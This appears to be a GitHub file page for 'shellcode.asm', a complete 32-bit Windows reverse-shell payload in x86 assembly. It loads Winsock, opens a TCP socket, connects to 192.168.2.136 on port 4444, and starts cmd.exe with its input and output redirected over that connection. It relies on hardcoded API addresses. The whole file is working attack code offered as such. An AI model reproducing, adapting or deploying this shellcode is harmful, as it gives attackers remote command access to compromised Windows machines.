-
Notifications
You must be signed in to change notification settings - Fork 22
/
Copy pathshellcode.asm
167 lines (127 loc) · 2.51 KB
/
shellcode.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
global _start
section .text
_start:
; Get the windows socket dll name
xor eax, eax
mov ax, 0x3233 ; '\0\023'
push eax
push dword 0x5f327377 ; '_2sw'
push esp
; LoadLibrary
mov ebx, 0x75982864 ; LoadLibraryA(libraryname)
call ebx
mov ebp, eax ; winsocket dll handle is saved into ebp
; Get the funtion name: WSAStartUp
xor eax, eax
mov ax, 0x7075 ; '\0\0up'
push eax
push 0x74726174 ; 'trat'
push 0x53415357 ; 'SASW'
push esp
push ebp
mov ebx, 0x75981837 ; GetProcAddress(hmodule, functionname)
call ebx
; CAll WSAStartUp
xor ebx, ebx
mov bx, 0x0190
sub esp, ebx
push esp
push ebx
call eax ; WSAStartUp(MAKEWORD(2, 2), wsadata_pointer)
; Get the function name: WSASocketA
xor eax, eax
mov ax, 0x4174 ; '\0\0At'
push eax
push 0x656b636f ; 'ekco'
push 0x53415357 ; 'SASW'
push esp
push ebp
mov ebx, 0x75981837 ; GetProcAddress(hmodule, functionname)
call ebx
; Call WSASocket
xor ebx, ebx
push ebx
push ebx
push ebx
xor ecx, ecx
mov cl, 6
push ecx
inc ebx
push ebx
inc ebx
push ebx
call eax ; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
; IPPROTO_TCP = 6, NULL,
; (unsigned int)NULL, (unsigned int)NULL);
xchg eax, edi ; Save the socket handle into edi
; Get the function name: connect
mov ebx, 0x74636565 ; '\0tce'
shr ebx, 8
push ebx
push 0x6e6e6f63 ; 'nnoc'
push esp
push ebp
mov ebx, 0x75981837 ; GetProcAddress(hmodule, functionname)
call ebx
; Call connect
push 0x8802a8c0 ; 0xc0, 0xa8, 0x02, 0x88 = 192.168.2.136
push word 0x5c11 ; 0x115c = port 4444
xor ebx, ebx
add bl, 2
push word bx
mov edx, esp
push byte 16
push edx
push edi
call eax ; connect(s1, (SOCKADDR*) &hax, sizeof(hax) = 16);
; Call CreateProcess with redirected streams
mov edx, 0x646d6363
shr edx, 8
push edx
mov ecx, esp
xor edx, edx
sub esp, 16
mov ebx, esp ; PROCESS_INFORMATION
push edi
push edi
push edi
push edx
push edx
xor eax, eax
inc eax
rol eax, 8
inc eax
push eax
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
push edx
xor eax, eax
add al, 44
push eax
mov eax, esp ; STARTUP_INFO
push ebx ; PROCESS_INFORMATION
push eax ; STARTUP_INFO
push edx
push edx
push edx
xor eax, eax
inc eax
push eax
push edx
push edx
push ecx
push edx
mov ebx, 0x75932062 ; CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
call ebx
end:
xor edx, edx
push eax
mov eax, 0x75982acf ; ExitProcess(exitcode)
call eax